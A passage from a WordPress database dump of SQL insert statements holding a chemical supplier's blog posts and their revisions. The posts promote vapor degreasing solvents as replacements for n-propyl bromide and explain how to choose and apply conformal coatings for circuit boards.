toxicity</li>\r\n 	<li>Zero ozone depletion potential (ODP)</li>\r\n 	<li>Low global warming potential (GWP)</li>\r\n</ul>\r\n<strong>What specific products can Opteon Sion Specialty Fluid replace?</strong>\r\n<ul>\r\n 	<li>n-Propyl Bromide (nPB)</li>\r\n 	<li>Lenium</li>\r\n 	<li>EnSolv</li>\r\n 	<li>AK-225</li>\r\n 	<li>Novec 72DE</li>\r\n 	<li>Solstice PF</li>\r\n 	<li>TF-113</li>\r\n 	<li>Water</li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Opteon Sion" ]\r\n\r\n<a href="https://www.miller-stephenson.com/product/sion/">Click here to learn more about Opteon Sion. </a>', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-10-10 17:49:19', '2016-10-10 17:49:19', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2465, 2, '2016-10-10 17:50:01', '2016-10-10 17:50:01', '<p><strong>What is Vapor Degreasing?</strong></p>\n<p>Vapor degreasing is a precision cleaning technique used to dissolve greases and remove soils from metal parts. Over the course of the manufacturing process, parts ranging from ball bearings to printed circuit boards become contaminated. Manufacturers employ vapor degreasing to ensure that performance, quality, reliability, and aesthetics are not impacted by these impurities.</p>\n<p><strong>What types of industries use vapor degreasing, and where is it used?</strong></p>\n<ul>\n<li><strong>Automotive</strong>:  Fuel injection, anti-lock braking systems, compressors, relays, sensors, switches</li>\n<li><strong>Aerospace:  </strong>Fuel injection, landing gear, oxygen systems, printed circuit boards</li>\n<li><strong>Medical Devices</strong>: Oxygen systems, eyewear, catheters, surgicaldevices/needles, implants</li>\n<li><strong>High-End Consumer Goods</strong>:  Watches, jewelry, camera lenses, flat panel displays, optical assemblies</li>\n<li><strong>Electronics/Semi-Conductors:</strong> Printed circuit boards, electrical contacts, cables, optical fibers, silicon wafer front opening unified pods (FOUPs), and flip chips</li>\n</ul>\n<p><strong>What problems do manufacturers face when it comes to vapor degreasing?</strong></p>\n<p>The biggest challenge facing manufacturers who utilize vapor degreasing is the need for a safe and sustainable solvent. The most commonly used solvent, n-Propyl Bromide (nPB), poses a safety risk to workers upon exposure, and regulations have banned the use of HCFCs like AK-225. Many manufacturers are now looking for solutions that are safe for their employees and the environment, without sacrificing performance.</p>\n<p><strong>What is Opteon Sion Specialty Fluid, and why are manufacturers converting to it?</strong></p>\n<p>Opteon Sion Specialty Fluid is a vapor degreasing solvent that is suitable to replace n-propyl bromide across many demanding cleaning applications. Manufacturers are switching to Opteon™ Sion because it provides an excellent combination of environmental, safety, health, and performance profiles that meet the high solvency needs of the industrial cleaning market. Opteon™ Sion is increasingly chosen for vapor decreasing, because of its industry leading solvency power (KB value), as well as its improved safety and environmental properties. Other benefits of Opteon™ Sion include, but are not limited to:</p>\n<ul>\n<li>Fast drying, increasing productivity</li>\n<li>Compatible with most metals, plastics, and elastomers</li>\n<li>Nonflammable and low toxicity</li>\n<li>Zero ozone depletion potential (ODP)</li>\n<li>Low global warming potential (GWP)</li>\n</ul>\n<p><strong>What specific products can Opteon Sion Specialty Fluid replace?</strong></p>\n<ul>\n<li>n-Propyl Bromide (nPB)</li>\n<li>Lenium</li>\n<li>EnSolv</li>\n<li>AK-225</li>\n<li>Novec 72DE</li>\n<li>Solstice PF</li>\n<li>TF-113</li>\n<li>Water</li>\n</ul>\n[ux_product_categories ids="231" number="10"]\n\n<p><a href="https://www.miller-stephenson.com/product/sion/">Click here to learn more about Opteon Sion. </a></p>', 'Opteon™ Sion for Vapor Degreasing', '', 'inherit', 'closed', 'closed', '', '1135-revision-v1', '', '', '2016-10-10 17:50:01', '2016-10-10 17:50:01', '', 1135, 'https://www.miller-stephenson.com/1135-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2466, 2, '2016-10-10 17:50:54', '2016-10-10 17:50:54', 'Why are Vertrel fluids a suitable replacement for nPB?\r\n\r\nRecently, the National Toxicity Program issued a report, dated August 2011, “Toxicology and Carcinogenesis Studies of 1-Bromopropane in F344/N Rats and B6C3F1 Mice (Inhalation studies).” https://ntp.niehs.nih.gov/ntp/htdocs/LT_rpts/TR564.pdf\r\n\r\nThe report concluded that there was “clear evidence of carcinogenic activity” in female mice and rats. As a result of this finding, Cal/OSHA has set an 8-hour worker permissible exposure limit (PEL) of 5 ppm. In addition, the American Conference of Governmental Industrial Hygienist (ACGIH) in 2011 has proposed a TLV of 0.1 ppm. Vertrel specialty fluids can replace nPB, providing the cleaning efficacy needed while addressing safety and health concerns. Here are five reasons it is an excellent replacement for nPB:\r\n<ol>\r\n 	<li><strong>Exposure Limit:</strong> Vertrel fluids have exposure limits around 200 ppm. By comparison, Isopropyl alcohol (rubbing alcohol) has an exposure limit of 200 ppm. The exposure limit of nPB exposure limit is measured between 5 ppm – 10 ppm by varying standards organizations.</li>\r\n 	<li> <strong>Cleaning Performance:</strong> Vertrel specialty fluids have the broadest range of cleaning power of any solvent family. KB values (a measure of cleaning power) range from 11 to a high of 110. Vertrel can match nPB’s cleaning power.</li>\r\n 	<li><strong>Solvent Maintenance:</strong> Vertrel fluids are inherently stable and do not need acid acceptance testing or stabilizer maintenance unlike nPB. In addition, the relatively high exposure limit of Vertrel enables the use of open top vapor degreasers, and solvent air monitoring can be kept to a minimum.</li>\r\n 	<li><strong>Solvent Usage:</strong> Today’s cleaning equipment manufacturers have improved system design resulting in significant reductions in the amount of solvent emissions and reducing overall operating costs. Vertrel is cost competitive with nPB as a result of the emissions reduction.</li>\r\n 	<li><strong>Global Acceptance:</strong> These specialty fluids are globally accepted as a safe cleaning material. Many countries have classified nPB as a reproductive toxin. In Europe, nPB is labeled as R60 (may impair fertility); R63 (possible risk of harm to the unborn child); and R48/20 (harmful: danger of serious damage to health by prolonged exposure through inhalation).</li>\r\n</ol>\r\n<strong>Summary</strong>\r\n\r\nVertrel <a href="https://www.miller-stephenson.com/chemicals/solvents/vertrel/">specialty fluids</a> have similar solvency strength as nPB. It is non-flammable, safe, and requires no stabilizers, making it an ideal replacement for nPB.\r\n\r\n<img class="alignnone size-full wp-image-2002" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/Vapor-Degreaser-1.jpg" alt="vapor-degreaser" width="680" height="498" />\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="Vertrel" ]', 'Why Vertrel specialty fluids are a suitable replacement for nPB', '', 'inherit', 'closed', 'closed', '', '1121-revision-v1', '', '', '2016-10-10 17:50:54', '2016-10-10 17:50:54', '', 1121, 'https://www.miller-stephenson.com/1121-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2467, 0, '2016-10-10 17:52:03', '2016-10-10 17:52:03', '', '', '', 'publish', 'closed', 'closed', '', '2467', '', '', '2016-10-10 17:52:03', '2016-10-10 17:52:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/2467/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2468, 2, '2016-10-10 17:52:06', '2016-10-10 17:52:06', '<p>Why are Vertrel fluids a suitable replacement for nPB?</p>\n<p>Recently, the National Toxicity Program issued a report, dated August 2011, “Toxicology and Carcinogenesis Studies of 1-Bromopropane in F344/N Rats and B6C3F1 Mice (Inhalation studies).” https://ntp.niehs.nih.gov/ntp/htdocs/LT_rpts/TR564.pdf</p>\n<p>The report concluded that there was “clear evidence of carcinogenic activity” in female mice and rats. As a result of this finding, Cal/OSHA has set an 8-hour worker permissible exposure limit (PEL) of 5 ppm. In addition, the American Conference of Governmental Industrial Hygienist (ACGIH) in 2011 has proposed a TLV of 0.1 ppm. Vertrel specialty fluids can replace nPB, providing the cleaning efficacy needed while addressing safety and health concerns. Here are five reasons it is an excellent replacement for nPB:</p>\n<ol>\n<li><strong>Exposure Limit:</strong> Vertrel fluids have exposure limits around 200 ppm. By comparison, Isopropyl alcohol (rubbing alcohol) has an exposure limit of 200 ppm. The exposure limit of nPB exposure limit is measured between 5 ppm – 10 ppm by varying standards organizations.</li>\n<li> <strong>Cleaning Performance:</strong> Vertrel specialty fluids have the broadest range of cleaning power of any solvent family. KB values (a measure of cleaning power) range from 11 to a high of 110. Vertrel can match nPB’s cleaning power.</li>\n<li><strong>Solvent Maintenance:</strong> Vertrel fluids are inherently stable and do not need acid acceptance testing or stabilizer maintenance unlike nPB. In addition, the relatively high exposure limit of Vertrel enables the use of open top vapor degreasers, and solvent air monitoring can be kept to a minimum.</li>\n<li><strong>Solvent Usage:</strong> Today’s cleaning equipment manufacturers have improved system design resulting in significant reductions in the amount of solvent emissions and reducing overall operating costs. Vertrel is cost competitive with nPB as a result of the emissions reduction.</li>\n<li><strong>Global Acceptance:</strong> These specialty fluids are globally accepted as a safe cleaning material. Many countries have classified nPB as a reproductive toxin. In Europe, nPB is labeled as R60 (may impair fertility); R63 (possible risk of harm to the unborn child); and R48/20 (harmful: danger of serious damage to health by prolonged exposure through inhalation).</li>\n</ol>\n<p><strong>Summary</strong></p>\n<p>Vertrel <a href="https://www.miller-stephenson.com/chemicals/solvents/vertrel/">specialty fluids</a> have similar solvency strength as nPB. It is non-flammable, safe, and requires no stabilizers, making it an ideal replacement for nPB.</p>\n<p><img class="alignnone size-full wp-image-2002" src="https://www.miller-stephenson.com/wp-content/uploads/2016/08/Vapor-Degreaser-1.jpg" alt="vapor-degreaser" width="680" height="498" /></p>\n[ux_product_categories ids="232" number="10"]', 'Why Vertrel specialty fluids are a suitable replacement for nPB', '', 'inherit', 'closed', 'closed', '', '1121-revision-v1', '', '', '2016-10-10 17:52:06', '2016-10-10 17:52:06', '', 1121, 'https://www.miller-stephenson.com/1121-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2469, 2, '2016-10-10 17:59:18', '0000-00-00 00:00:00', '<p class="largeText">Vertrel specialty fluids have unique physical and chemical properties that enable use in a wide range of applications. The environmental properties, nonflammability, and superior performance make Vertrel™ a popular choice.</p>\n<p class="largeText">Applications where Vertrel specialty fluids are commonly used include:</p>\n<p class="largeText"></p>', 'Vertrel Applications', '', 'draft', 'closed', 'closed', '', '', '', '', '2016-10-10 17:59:18', '2016-10-10 17:59:18', '', 0, 'https://www.miller-stephenson.com/?p=2469', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2470, 2, '2016-10-10 18:00:07', '0000-00-00 00:00:00', '', 'Applications Where Vertrel™ specialty fluids Are Used', '', 'draft', 'closed', 'closed', '', '', '', '', '2016-10-10 18:00:07', '2016-10-10 18:00:07', '', 0, 'https://www.miller-stephenson.com/?page_id=2470', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (2471, 58, '2016-10-10 18:13:23', '2016-10-10 18:13:23', '', '', '', 'publish', 'closed', 'closed', '', '2471', '', '', '2016-10-10 18:13:23', '2016-10-10 18:13:23', '', 0, 'https://www.miller-stephenson.com/nf_sub/2471/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2472, 60, '2016-10-10 18:40:58', '2016-10-10 18:40:58', '', '', '', 'publish', 'closed', 'closed', '', '2472', '', '', '2016-10-10 18:40:58', '2016-10-10 18:40:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/2472/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2473, 59, '2016-10-10 18:41:03', '2016-10-10 18:41:03', '', '', '', 'publish', 'closed', 'closed', '', '2473', '', '', '2016-10-10 18:41:03', '2016-10-10 18:41:03', '', 0, 'https://www.miller-stephenson.com/nf_sub/2473/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2474, 3, '2016-10-10 19:09:16', '2016-10-10 19:09:16', '<h2><strong>How Miller-Stephenson can help you choose the right Conformal Coating</strong></h2>\r\nMiller-Stephenson offers a complete series of electronic conformal coatings to meet any applicators protection requirements.  Urethane, Acrylic, Silicone, and Varnish coatings are available, each exhibiting specific chemical, mechanical and moisture resistance. Formulated with high performance base resins, Miller-Stephenson\'s conformal coatings promote extended service life and enhanced reliability for your PCB components and assemblies. Conformal coatings are particularly useful for protecting circuitry in severe service environments, while maintaining a low stress environment for components and connections. These severe conditions range from every day temperature and humidity extremes seen in consumer electronics, to the more harsh automotive underhood applications, up to the extremes demanded in military or industrial applications. All of our formulations are 100% nonflammable and available in both an aerosol and bulk packaging.\r\n<h2><strong>What are Conformal Coatings?</strong></h2>\r\nConformal coatings are specialized film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography of a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because necessity for an additional insulative coating layer between circuits to prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable”, allowing trapped moisture in electronic boards to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission and degradation to occur. There are typically four classes of conformal coatings : Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\n<h2><strong>Types of Conformal Coating:</strong></h2>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/acrylic-conformal-coating/"><strong>ACRYLIC:</strong></a> Acrylic coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/silicone-confromal-coating/"><strong>SILICONE:</strong></a> Silicone coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/urethane-conformal-coating/"><strong>URETHANE:</strong></a> Polyurethane coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like <a href="https://www.miller-stephenson.com/product/conformal-coating-stripper/">MS-114</a> Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/product/ms-252n/"><strong>VARNISH:</strong></a> Varnish coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\nEqually as important as choosing the correct resin is proper application and cure of the coating.  To be effective, a coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge to generate a ubiquitous layer throughout the entire board or device\r\n<h2><strong><img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />Applying Conformal Coatings:</strong></h2>\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the three main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as <a href="http://www.nordson.com/en/divisions/asymtek">Asymtek</a>. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular leveling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB. Cleanliness of the substrate is of extreme importance for the successful application of a coating. Surfaces must be free of moisture, dirt, wax, grease, flux residues and all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commercial-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\nThese products can also be found on Ellsworth <a href="https://www.ellsworth.com/products/conformal-coatings/polyurethane/miller-stephenson-ms-470c-urethane-conformal-coating-clear-14-oz-aerosol/">here.</a>', 'Choosing the Right Conformal Coatings', '', 'publish', 'closed', 'closed', '', 'conformal-coatings', '', '', '2017-08-09 22:59:44', '2017-08-09 22:59:44', '', 0, 'https://www.miller-stephenson.com/?p=2474', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2475, 3, '2016-10-10 18:50:31', '2016-10-10 18:50:31', '', 'conformal coatings', '', 'inherit', 'closed', 'closed', '', 'shutterstock_72593680', '', '', '2017-08-09 22:55:03', '2017-08-09 22:55:03', '', 2474, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_72593680.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2476, 3, '2016-10-10 19:02:00', '2016-10-10 19:02:00', 'Conformal coatings are specialty film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because the additional insulative coating layer between circuits can prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable” coatings, allowing trapped moisture in circuit board to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulating properties allow a reduction in PCB conductor spacing of over 80%</li>\r\n 	<li>Can help eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Light weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are typically four class of conformal coating to choose from:\r\n<ul>\r\n 	<li><strong>ACRYLIC:</strong> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>SILCONE:</strong> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>URETHANE:</strong> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n 	<li><strong>VARNISH:</strong> – These coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edges of the board, as these will not even have any solder resist present.\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the four main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n 	<li>Brushing – requires extremely proficient and skilled operators in order to be suitable for production purposes</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB.\r\n\r\nMiller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-10 19:02:00', '2016-10-10 19:02:00', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2477, 3, '2016-10-10 19:05:52', '2016-10-10 19:05:52', 'conformal coating', 'conformal coating', 'conformal coating', 'inherit', 'closed', 'closed', '', 'coating_-_ge_033-tif', '', '', '2016-10-10 19:06:10', '2016-10-10 19:06:10', '', 2474, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2478, 3, '2016-10-10 19:09:16', '2016-10-10 19:09:16', 'Conformal coatings are specialty film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because the additional insulative coating layer between circuits can prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable” coatings, allowing trapped moisture in circuit board to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulating properties allow a reduction in PCB conductor spacing of over 80%</li>\r\n 	<li>Can help eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Light weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are typically four class of conformal coating to choose from:\r\n<ul>\r\n 	<li><strong>ACRYLIC:</strong> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>SILCONE:</strong> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>URETHANE:</strong> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>VARNISH:</strong> – These coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge\r\n\r\n<img class="alignleft wp-image-2477" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Coating_-_ge_033.tif.jpg" alt="conformal coating" width="343" height="343" />\r\n\r\n&nbsp;\r\n\r\nThe effectiveness of the coating is influenced by the efficiency of the application method, which also governs the type of coating used.  Typically coating thickness of 1-2 mil is recommended to ensure coating robustness, uniform coverage, and long-term stability. Thicker coatings can be applied however dielectric properties of the coating may be effected. There are the four main ways of applying a conformal coating:\r\n<ol>\r\n 	<li>Dipping – limited to materials that do not cure quickly by moisture, oxidation or light</li>\r\n 	<li>Selective robotic coating – such as Asymtek. All coating types can be used if the correct dispense head is selected</li>\r\n 	<li>Spraying – hand spray using a spray booth or aerosol can. All coatings can be applied in this way</li>\r\n 	<li>Brushing – requires extremely proficient and skilled operators in order to be suitable for production purposes</li>\r\n</ol>\r\nThe liquid coating application should thoroughly wet all surfaces and cure without leaving surface defects. Defects typically observed are hazy or cloudiness, air bubbles, irregular levelling (known as orange peel), or voids.  These defects can have substantial effects on the final performance of the coating and one should consider re-working the PCB.\r\n\r\nMiller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n&nbsp;\r\n\r\n&nbsp;', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-10-10 19:09:16', '2016-10-10 19:09:16', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2480, 3, '2016-10-10 19:14:21', '2016-10-10 19:14:21', 'Conformal coatings are specialty film forming polymers that protect circuit boards and other electronic components from adverse environmental conditions and mechanical abrasion. These coatings ‘conform’ to the irregular topography a electronic circuit board, providing increased dielectric resistance, operational and structural integrity, and protection from corrosive elements, moisture, heat, fungus, and airborne contaminants such as dirt and dust. With continued miniaturization of electronics, the necessity of conformal coating has increased because the additional insulative coating layer between circuits can prevent arcing or current bleed.\r\n\r\nConformal coatings are also “breathable” coatings, allowing trapped moisture in circuit board to escape while maintaining protection from environmental contaminates. However these coatings are not sealants, and prolonged exposure to vapors will cause transmission to occur. There are typically four classes of conformal coatings: Acrylic, Urethane, Silicone, and Varnish. While each has its own specific physical and chemical properties each are able to perform the following functions:\r\n<ul>\r\n 	<li>Insulation: Allowing reduction in conductor spacing</li>\r\n 	<li>Eliminate the need for complex, sophisticated enclosures</li>\r\n 	<li>Minimal effect on component weight</li>\r\n 	<li>Completely protect the assembly against chemical and corrosive attack</li>\r\n 	<li>Eliminate potential performance degradation due to environmental hazards</li>\r\n 	<li>Minimize environmental stress on a PCB assembly</li>\r\n</ul>\r\nAs mentioned there are typically four class of conformal coating to choose from:\r\n<ul>\r\n 	<li><strong>ACRYLIC:</strong> Acrylic conformal coatings provide fair elasticity and general protection. As one‐part systems, they are easy to apply, remove, and re-work. Acrylic conformal coatings are recognized for their high dielectric strength, abrasion resistance and ease of removal.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>SILCONE:</strong> Silicone conformal coatings provide excellent protection in a very wide temperature range, have high dielectric strength, and low excellent self-leveling properties. They provide good chemical resistance, UV resistance, salt spray resistance and are very flexible. This is the coating least compatible with all of the other coating types.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>URETHANE:</strong> Polyurethane conformal coatings are known for their excellent moisture and chemical resistance and good dielectric properties. They are also very abrasion resistant. Urethanes typically require specialized stripping solvents like MS-114 Conformal Coating Stripper.</li>\r\n</ul>\r\n<ul>\r\n 	<li><strong>VARNISH:</strong> – These coatings are natural‐based resins that form tough coatings which are moisture resistant materials that lack the flexibility of the above materials, and also have greater variations in insulative properties and stability.</li>\r\n</ul>\r\n&nbsp;\r\n\r\nEqually as important as choosing the correct resin is proper application and cure of the conformal coating.  To be effective, a conformal coating should completely cover the assembly and provide good coverage of sharp edges (components and component leads) and other contours (solder joints, etc). It may even be essential to coat the edge\r\n\r\n<img class="alignleft wp-image-2477" 